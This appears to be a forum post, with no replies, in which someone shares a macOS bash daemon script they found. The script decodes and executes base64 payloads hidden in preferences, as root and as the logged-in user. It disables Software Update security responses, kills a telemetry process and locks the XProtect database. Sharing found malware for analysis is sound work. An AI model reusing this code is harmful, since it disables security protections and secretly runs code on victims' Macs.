找到的主脚本如下
defaults read fqijeu lqqr_djhxqjf | base64 --decode
date whoami cd /Users/Shared pwd root_tasks() { /usr/bin/defaults write /Library/Preferences/com.apple.SoftwareUpdate.plist ConfigDataInstall -bool false /usr/bin/defaults write /Library/Preferences/com.apple.SoftwareUpdate.plist AllowRapidSecurityResponses -bool false kill_processes() { while true; do pgrep -fi 'CloudTelemetryService' | xargs -r -I {} sh -c 'kill -9 {} && echo "killed PID {}"' sleep 1 done } kill_processes & perl -e 'open my $fh, "<", "/var/protected/xprotect/XPdb" or die $!; flock($fh, 2) or die $!; while (1) { sleep 60; }' & echo "I am a root task $(whoami)" } network_tasks() { while ! ping -c1 -W1 1.1.1.1 &> /dev/null ; do echo 'no net' sleep 5 done echo 'net available' "$1" echo 'network task completed.' } localuser_tasks() { while true; do localuser=$(scutil <<< "show State:/Users/ConsoleUser" | awk '/Name :/ && ! /loginwindow/ { print $3 }') if [[ -n "$localuser" ]]; then break fi echo 'No logged-in user. Retrying...' sleep 5 done echo "[LOGGED IN] $localuser" task() { sleep 30 sudo -u "$localuser" /bin/bash <<EOF defaults read 'fqijeu' 'burlh_dqeur_rkq' | base64 --decode | env SRC='Daemon' sh >/dev/null 2>&1 & EOF } network_tasks task & } loop_tasks() { echo 'Daemon is running...' if [ -e "/Users/echo/.kill" ]; then echo 'killing...' grep -lir 'echo.*base64.*sh' /Library/LaunchDaemons/ 2>/dev/null | while read -r file; do echo "$file" rm -f "$file" done rm -f "/Users/echo/.kill" echo 'killed.' exit fi } root_tasks & localuser_tasks & while true; do loop_tasks & sleep 60 done 目前尚无回复
Select Language